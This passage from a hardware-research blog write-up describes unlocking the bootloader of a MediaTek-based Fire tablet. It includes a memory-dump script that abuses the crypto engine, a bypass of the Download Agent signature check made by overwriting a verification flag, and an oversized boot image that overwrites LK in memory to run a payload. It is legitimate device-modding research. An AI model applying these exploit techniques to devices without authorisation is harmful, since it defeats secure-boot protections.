- 0xCAFEBABE ^ 0x4dd12bdf = 0x872f9161
- 0x13371337 ^ 0x0ec7d26c = 0x1df0c15b
- 0xDEADBEEF ^ 0x482490b3 = 0x96892e5c
- 0xCAFEBABE ^ 0x482a1b1f = 0x82d4a1a1
The source address for the AES operation is set to 0, and the destination address is set to 0x1000.
By triggering the AES decryption, the XORed data gets transformed back to the original plaintext and written to the target address.

My failed attempt to dump bootROM

I tried to replicate the same method on my device, but by using the Preloader's CMD_READ32 command to read the GCPU's registers. While I was able to read and write GCPU registers, and I could even execute cryptographic operations, every time I tried to read 0x0, the IV came out as zero :(

After realizing I couldn't read anything from 0x0, I started to think that the second stage of the Preloader, which I'm targeting, might be running under an insufficiently privileged context and the GCPU somehow knew that.

In any case, I created a simple script to loop over the memory in chunks and try read operations everywhere until I hit something that is only zeros:

with open("test.txt", 'w') as f:
    address = 0x0
    step_size = 0x1000
    try:
        while True:
            data = dev.aes_read16(address)
            if data.hex() != '00000000000000000000000000000000':
                output = f'aes16_read @ 0x{address:08x} = {data.hex()}'
                print(output)
                f.write(output + '\n')
            address += step_size
    except KeyboardInterrupt:
        print(f'Last address: 0x{address:08x} (data: {data.hex()})')

I left the script dumping memory overnight and when I woke up, I found out that it had crashed at 0xffff0000:

Current address: 0xffff0000, Block data: 00000000000000000000000000000000
Traceback (most recent call last):
  File "/home/r0rt1z2/amonet/modules/main.py", line 204, in <module>
    main(dev, args)
  File "/home/r0rt1z2/amonet/modules/main.py", line 39, in main
    data = dev.aes_read16(address)
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/r0rt1z2/amonet/modules/common.py", line 222, in aes_read16
    self.write32(CRYPTO_BASE + 0xC04, addr)
  File "/home/r0rt1z2/amonet/modules/common.py", line 171, in write32
    self.dev.write(struct.pack(">I", word))
                   ^^^^^^^^^^^^^^^^^^^^^^^
struct.error: 'I' format requires 0 <= number <= 4294967295

However, I open the file and found out it actually dumped a lot of memory! Apparently, it started dumping from 0x80000000 and stopped when it reached 0xffff0000.

Uploading my own payload

After failing to dump bootROM, I decided to try to upload my own payload to the device. The first thing I did was to reverse engineer the Preloader to see how it handled Download Agents, since that was the only way to jump to something from the Preloader.

To understand how it works, let's take a look at the usbdl_handler function, which manages USB communication.

The device waits for a specific magic sequence from the host to stay in Preloader mode and accept instructions. If the magic sequence isn't received within a set timeout, the device continues with the normal boot process.

int usbdl_handler(bldr_comport *comport, uint32_t hshk_tmo_ms) {
    memcpy(startcmd_, startcmd, 4);
    start = get_timer(0);
    comm = comport->ops;
    uVar6 = 0;
    len32 = len32 & 0xffffff00;

    /*
     * handshake process begins here, the host has a few
     * seconds to send the magic sequence so the device
     * stays in Preloader mode and listens for commands.
     */
    while (true) {
        platform_wdt_kick();
        usbdl_get_byte(&cmd);

        if (cmd != 0xfe) {
            usbdl_put_byte(cmd); // echo back
        }
        // ...

If the magic sequence is received, the device enters a loop, continuously listening for instructions from the host. If we take a look at some of the leaked BSPs, we'll find a list of commands that the Preloader supports.

#define CMD_GET_HW_SW_VER          0xfc  // Get hardware and software version information from the device
#define CMD_GET_HW_CODE            0xfd  // Retrieve the hardware code that identifies the SoC model
#define CMD_GET_BL_VER             0xfe  // Get bootloader version currently running on the device
#define CMD_LEGACY_WRITE           0xa1  // Legacy write command for backward compatibility with older SoCs
#define CMD_LEGACY_READ            0xa2  // Legacy read command for backward compatibility with older SoCs
#define CMD_READ32                 0xD1  // Read 32-bit value from specified memory address within allowed range
#define CMD_WRITE32                0xD4  // Write 32-bit value to specified memory address within allowed range
#define CMD_JUMP_DA                0xD5  // Jump to Download Agent at fixed address after verification
#define CMD_SEND_DA                0xD7  // Send Download Agent binary to device memory for execution

Since I used CMD_WRITE32 in a lot of places, it's worth explaining how it works. This command is used to write a 32-bit value to a specific memory address. The host sends the command, the address, and the data to be written, and the device echoes back the address and data to confirm the operation.

It's worth noting that there's a range check to ensure the address is within a valid range; otherwise, we wouldn't have to abuse the crypto engine at all.

        /*
         * there are quite a few cmds, but I skipped
         * their handlers to focus on CMD_WRITE32 which
         * is what we'll use.
         */
        uint32_t addr = 0;
        uint32_t data = 0;
        uint32_t len32 = 0;

        // receive the parameters from the host.
        usbdl_get_dword((uint32_t *)&base_addr);
        usbdl_put_dword((uint32_t)base_addr);
        usbdl_get_dword(&len32);
        usbdl_put_dword(len32);

        // check the alignment of the address.
        if (((uint)addr & 3) != 0) goto err_and_ret;

        // make sure the size is actually valid.
        if (len32 == 0) goto err_and_ret;

        // prevent overflow attacks.
        if (len32 << 2 <= len32) goto err_and_ret;

        // check if the address range is valid.
        sec_region_check((uint32_t)addr, len32 << 2);
        // ...

Next, the device enters a loop to receive data from the host, writing each data packet to the specified memory address. This process continues until all data is written. Once complete, the function handles any additional instructions or finalizes the Preloader operations.

        /*
         * if we reach this point, all the checks have passed
         * and we can notify the host about it so he can start
         * sending us the data we need to write.
         */
        usbdl_put_word(0);

        for (index = 0; index < len32; index = index + 1) {
            usbdl_get_dword(&data);
            usbdl_put_dword((uint32_t)data);
            *(uint32_t**)(base_addr + index * 4) = data;
        }
    }
    /*
     * the rest of the command handler would follow here, I
     * decided to omit it to keep this portion more simple.
     */
    return 0; 
}

The next interesting command is CMD_JUMP_DA, which is used to jump to a Download Agent (DA) located at a (fixed) memory address. Naturally, the DA downloaded by the host has to be signed for this command to actually work and not crash.

if (local_41 == 0xd5) {
  usbdl_get_dword(&da_addr);
  usbdl_put_dword((uint32_t)da_addr);
  if (g_da_verified == 1) {
    status = 0;
  }
  else {
    status = 0x2001; // DA_IMAGE_SIG_VERIFY_FAIL
  }
  usbdl_put_word((uint16_t)status);
  if (status != 0) {
    dprintf("%s usbdl_jump_da: %x\n","[USBDL]",status);
    ASSERT("download.c",0x282,"0"); // crash and reboot
  }
  da_addr = &DAT_80001000;
  _da_arg->magic = 0x58885168;
  _da_arg->ver = 1;
  _da_arg->flags = 3;
  // ...
  g_boot_mode = 100;
  bldr_jump((uint32_t)da_addr,0x80000ff4,0xc);
  // ...
}

So, as we can see, if g_da_verified is set to 1, the device will jump to the fixed address 0x80001000 and execute the DA. If the DA is not verified, the device will crash and reboot.

We know that aes_write16 and aes_read16 can be used starting from address 0x80000000, so we can technically upload the payload in chunks of 16 bytes and then call it a day!

Oh, but there's a catch. As we've seen, g_da_verified is only set to 1 if the DA is signed. After countless hours of trying to bypass this restriction, out of mere desperation, I tried to write to that global variable with CMD_WRITE32 and... it worked! I was able to set it to 1 and jump to my own payload.

[2024-07-21 02:02:21.020854] Waiting for Preloader
[2024-07-21 02:02:40.487613] Found port = /dev/ttyACM0
[2024-07-21 02:02:40.527277] Handshake
[2024-07-21 02:02:40.549432] Disable watchdog
[2024-07-21 02:02:40.549937] Init crypto engine
[2024-07-21 02:02:40.565977] Disable DA verification check
[2024-07-21 02:02:40.566455] Load payload from ../brom-payload/pl/pl.bin = 0x3BB2 bytes
[2024-07-21 02:02:48.838860] Let's rock
[2024-07-21 02:02:48.839156] Wait for the payload to come online...
[2024-07-21 02:02:50.813918] all good

[PLFM] USB cable in
[TOOL] USB enum timeout (Yes), handshake timeout(Yes)
[USBD] USB Full Speed
[TOOL] Enumeration(Start)
[USBD] USB High Speed
[USBD] USB High Speed
[TOOL] Enumeration(End): OK 537ms 
[TOOL] sync time 277ms
[BLDR] jump to 0x80001000
[BLDR] <0x80001000>=0xFA000025
[BLDR] <0x80001004>=0xB5072300
[R0rt1z2] Hello from the other side!

At this point I was able to upload my own payload to the device and execute it. I simply based it on k4y0z's Preloader based payload for mantis and called it a day.

As for bootROM, when I tried to dump 0x0 (with the payload, that is), I got the following output:

00000000  04 f0 1f e5 00 10 00 12  04 f0 1f e5 00 10 00 12  |................|

As we've seen before, this is a jump instruction, which in this case redirects execution to 0x12001000. Doesn't this sound familiar? Yes, it's where PL1 gets loaded as well. So when I tried to dump that address, I was greeted by PL1 instead of bootROM.

I haven't bothered further with this, as it seemed like I hit a dead end. The only way to dump bootROM at this point was to gain arbitrary code execution before PL1 gets loaded, which is fairly complicated.

Unlocking the bootloader

After successfully gaining direct read/write access to the eMMC, the next step was to find a way to exploit the LK to permanently unlock the bootloader.

The first idea that came to mind was to use amonet's microloader, porting it from ford to ariel (considering they're very similar). However, I wondered, is it going to be that easy? That's what I was about to find out...

As explained in my previous article, microloader works by crafting a malicious boot image with a user-controlled kernel load address. This allows it to overwrite a portion of the LK (the one loaded into RAM and running at runtime) with a ROP chain, which is then executed by pivoting the stack.

This would be perfect... if only it had worked. I did a quick test on my device and was greeted with an image verification failure.

[1250]  > page count of kernel image = 2
[1260] Verifying kernel...
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1270] Error: fail to check 0xBC for pkcs_1_pss_decode_sha256 operation
[1270] [VERIFY_BOOTIMG] Error: fail to do pss decode for boot data.
[1280] [MBOOT] Load 'Android Boot Image' partition Error
[1290] 
[1290] *******************************************************
[1290] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1300] *******************************************************
[1300] > Please check kernel and rootfs in Android Boot Image are both correct.
[1310] *******************************************************
[1310] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1320] *******************************************************

So, what's going on? Why doesn't it crash LK instead, considering we're technically overwriting it? To get to the bottom of this, I decided to reverse engineer my LK image.

While doing so, I discovered that the load address specified in the header of the boot image is actually ignored. Regardless of what address you choose, the bootloader will always use 0x80208000 as the kernel load address.

// ... this is app(). After performing some initializations, 
// LK proceeds to load either a boot image, a recovery image, 
// or a factory image. Under all circumstances, it hardcodes 
// the load address.
ret = mboot_android_load_bootimg_hdr("boot", 0x80208000); // header
if (-1 < ret) {
  iVar1 = mboot_android_load_bootimg("boot", 0x80208000); // image
  if (ret == -1) {
      msg_img_error("Android Boot Image"); // error and trigger assert()
  }
}
msg_header_error("Android Boot Image"); // error and trigger assert()
// ...

As you can see, the second parameter of mboot_android_load_bootimg (which is the function amonet exploits) is a hardcoded load address. This address is then used to load the kernel into memory:

int mboot_android_load_bootimg(char *part_name, ulong addr) {
    part_dev_t *dev;
    part_t *part;
    int ret;
    uint64_t offset;

    dev = mt_part_get_device();
    if (dev == NULL) {
        dprintf("mboot_android_load_bootimg , dev = NULL\n");
        return -0x13;
    }

    part = mt_part_get_partition(part_name);
    if (part == (part_t *)0xffffffff) {
        dprintf("mboot_android_load_bootimg , part = NULL\n");
        return -2;
    }

    offset = partition_get_offset((int)part);
    // load whatever the data is to 0x80208000
    ret = dev->read(dev, addr, (uchar *)addr, (int)offset);

    if (verify_image(1, addr, _DAT_81e6c420, 0) == 0) {
        if (is_prod_device()) {
            FUN_81e3f6a0("console=tty0 console=ttyMT3,115200n1 root=/dev/ram", "%s androidboot.prod=1", "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        } else {
            FUN_81e3f6a0("console=tty0 console=ttyMT3,115200n1 root=/dev/ram", "%s androidboot.prod=0", "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        }
    } else {
        dprintf("failed to verify boot image. size :0x%x", _DAT_81e6c420);
        return -5;
    }

    return ret;
}

If you're quick enough (unlike me :P), you might have noticed that although the address is hardcoded, the verification of the data is carried out AFTER the image is loaded into memory.

Great, so how is this helpful to us? Well, this is where math comes in handy. We know that:

LK's load address in memory is 0x81E00000.
The kernel load address in memory is 0x80208000.

Notice that LK is placed AFTER (sometimes I wonder if MediaTek engineers are just plain stupid) the kernel in the memory stack. This means that, technically, flashing a huge boot image could overwrite the loaded LK data, giving us the ability to execute arbitrary code.

The difference between the two addresses is 0x81E00000 - 0x80208000 = 0x1BF8000, which is roughly 30 MB. Do you see where I'm going with this?

Modifying the GPT

This step was quite easy, considering that we did it before in sloane to exploit LK in the same way. In this case, we just had to rename the original recovery and boot partitions to recovery_x and boot_x, then shrink userdata and create two 30 MB partitions called boot and recovery (which are what LK will pick up).

Since we don't have much internal memory on ariel (it's either 8GB - for the HD7 - or 16 GB - for the HD6), I decided to shrink the cache partition instead, which has a total size of 1GB ~. In any case, the resulting GPT looked like this:

  Number   Start (sector)     End (sector)  Size          Name
      1               64              319  128.00 KiB    PRO_INFO
      2             2048            10239  4.00 MiB      PMT
      3            10240            20479  5.00 MiB      TEE1
      4            20480            30719  5.00 MiB      TEE2
      5            30720            31743  512.00 KiB    UBOOT
-     6            31744            48127  8.00 MiB      boot
-     7            48128            64511  8.00 MiB      recovery
+     6            31744            48127  8.00 MiB      boot_x
+     7            48128            64511  8.00 MiB      recovery_x
      8            64512            66559  1024.00 KiB   KB
      9            66560            68607  1024.00 KiB   DKB
     10            68608            69631  512.00 KiB    MISC
     11            69632           102399  16.00 MiB     persisbackup
     12           102400          2559999  1.17 GiB      system
-    13          2560000          4239359  1.00 GiB      cache
+    13          2560000          4239359  820.00 MiB    cache
+    14          4239360          4300799  30.00 MiB     boot
+    15          4300800          4362239  30.00 MiB     recovery
     16          4362240         30527454  12.48 GiB     userdata

Crafting the malicious boot image

Once we had the GPT ready, the next step was to craft a (big enough) boot image that would overwrite LK in memory. On older devices, a ROP chain was used to redirect execution to the payload, but with time we (k4y0z, t0x1cSH and I) realized it wasn't necessary.

One could just overwrite a function that gets called before the verification process with a direct jump to the payload. In the case of ariel, I decided to overwrite 0x81e099e8, which is the function used to verify the boot image:

int verify_img(int flag, void *img, uint p3, uint p4) {
    char status = *(char *)(_DAT_81e81258 + 0x16);
    int ret;

    if (status == '\x01') {
        dprintf("Device or user build unlocked, or non-user build on engineering device! Skip kernel verification.\n");
        if (flag != 0) {
            flag = 0;
            sprintf("console=tty0 console=ttyMT3,115200n1 root=/dev/ram",
                    "%s androidboot.unlocked_kernel=true",
                    "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        }
    } else if (status == '\x02') {
        dprintf("Verifying kernel with engineering key...\n");
        ret = verify_img_type(img, p3, 1);
        if (ret != 0) {
            ret = -5;
        }
        return ret;
    } else {
        if (!is_prod_dev()) {
            dprintf("User build on engineering device. Skip verification.\n");
            return 0;
        }
        dprintf("Verifying kernel...\n");
        ret = verify_img_type(img, p3, 0);
        if (ret == 0) {
            if (flag != 0) {
                flag = 0;
                sprintf("console=tty0 console=ttyMT3,115200n1 root=/dev/ram",
                        "%s androidboot.unlocked_kernel=false",
                        "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
            }
            return 0;
        } else {
            flag = -5;
        }
    }
    return flag;
}

I simply forked sloane's amonet repository and modified the create_boot_img.py script to suit my needs. The result can be found here, and it generated the following image:

Payload Address: 0x81dff000
Payload Block:   57271
Part Size:       29763948 (28.39 MiB / 58133 Blocks)
Writing ../bin/boot.hdr...
Writing ../bin/boot.payload...

Lastly, I modified the bootROM-based Python scripts to automatically patch the GPT, downgrade bootloader images, and flash the payload to the corresponding block.

It took me a few attempts, but after adjusting some minor details, like using BL instead of BLX (unlike the original sloane exploit), I managed to jump to the payload and unlock the bootloader!

The functionality of the payload itself is the same as the one explained in my previous article. I just had to modify some parts to make it compatible with such an old device, such as the dev-read/write operations. You can check the full code here.

Demo of the PoC in action

Bonus: LineageOS 12.1

Considering how slow FireOS is, I decided it would be a great idea to have a smooth AOSP-based ROM. Since my motivation to build ROMs has been waning over the past few years, I didn't feel like bringing something newer than the latest stock version. Instead, I decided to build LineageOS 12.1 (formerly known as CyanogenMod 12.1) and make it as stable as possible.

After a few weeks of work, I managed to build a pretty solid ROM that runs 200 times faster than FireOS and is much more customizable. As of the time of writing, the only bug the ROM has is video recording, which crashes the Camera application. All the sources used to build both TWRP and LineageOS 12.1 can be found on this GitHub organization.

Screenshot 1	Screenshot 2

Conclusions

This was a fun journey, and I'm glad I managed to unlock the bootloader and build a custom ROM for the device. This process has helped me acquire a lot of knowledge about MediaTek devices and how they work at a low-level scope.

I'd like to thank k4y0z, t0x1cSH, and AntiEngineer for helping me with this project, both software and hardware-wise. I'd also like to thank zeroepoch and xyz for their amazing work on MediaTek devices. Nothing would have been possible without their contributions.

With this, I'm finishing this article. I hope you enjoyed reading it as much as I enjoyed writing it :)